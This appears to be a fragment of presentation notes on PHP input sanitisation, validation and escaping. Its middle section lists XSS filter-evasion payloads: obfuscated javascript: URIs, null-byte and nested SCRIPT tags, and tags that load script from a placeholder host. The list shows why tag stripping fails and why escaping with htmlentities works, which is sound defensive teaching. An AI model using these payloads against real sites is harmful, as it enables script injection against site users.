things like backslashes or entity tags found in stored data. This is all very well and good, but what happens if you want to put this into an email message or save out to a text document? “Strip out all tags!” can result in mangled content: eg. <3, <( ^o^)>, 1 < x < 5, “if foo <> bar then”
getting rid of the nasties. Checking data is of the correct type, eg. email addresses, postcodes, message text. Stripping out control characters, fixing multibyte encoding shenanigans with iconv(). Escaping: Packaging data up for transport. mysql_real_escape_string() for MySQL strings. htmlentities($x, ENT_QUOTES, 'UTF-8'); for HTML. urlencode() for query params.
<script> tags we find? <IMG SRC=javascript:alert('a')> <img src=javascript:alert("a")> <img “””><script>alert('a')</script>”> <IMG SRC=javascr ipt:aler t('XSS')> <IMG SRC=javascr ipt:aler t('XSS')> <IMG SRC="jav ascript:alert('a');"> <IMG SRC="jav	asœript:alert('XSS');"> <IMG SRC="jav
ascript:alert('XSS');"> <SCR\0IPT>alert('a')</SCR\0IPT> <SCRIPT/a SRC="http://foo/x.js"></SCRIPT> <img onmouseover!#$%&=alert('a')> <<SCRIPT>alert("a");//<</SCRIPT> <SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT> <SC\0RIPT SRC=http://foo/x.js?<B> <script src=//foo/x.js> <img src=”javascript:alert('a')” <IMG SRC = " j a v a s c r i p t : a l e r t ( ' a ' ) " >
HTML; package it appropriately. Using htmlentities($xsslol, ENT_QUOTES, 'UTF-8') will completely neuter most of this stuff. Use it even on the things you “trust” like $_SERVER['PHP_SELF'], or REQUEST_URI. It gets hard when you need to put user data into src=”” and style=”” fields; suggest using a whitelist instead, no matter how much of a pain it is to implement. (Or in the case of images and other files, generating the filename for them.)